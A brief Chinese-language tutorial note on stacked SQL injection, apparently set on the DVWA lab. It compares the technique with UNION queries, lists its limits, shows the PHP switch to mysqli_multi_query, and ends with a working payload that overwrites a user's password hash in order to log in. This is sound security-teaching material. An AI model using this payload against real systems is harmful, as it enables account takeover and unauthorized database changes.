目录
- 多条SQL语句一起执行
与联合查询的区别
- UNION和UNIION ALL只能执行查询语句,堆叠注入可以执行任意语句
- 可能受到权限不足、数据库引擎和API不支持的限制,虽然场景少,但是威力大
局限性
- 通常只能返回一个查询结果,因此第二语句产生的错误或结果会被忽略
- 使用堆叠注入前需要知道数据库的一些相关信息
注入过程
- 用户密码经过单向散列后可能无法破解,可以利用堆叠注入修改用户密码字段的内容,成功登录后再修改回来
- 修改php文件中使用的API:
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query); # 使用的原API mysqli_multi_query($GLOBALS["___mysqli_ston"], $query); $result = mysqli_use_result($GLOBALS["___mysqli_ston"]); # 可以使用堆叠注入的API
- 修改完成后验证能否正常查询
- payload:
id=1';update users set password='21232f297a57a5a743894a0e4a801fc3' where user_id=1; --;&Submit=Submit#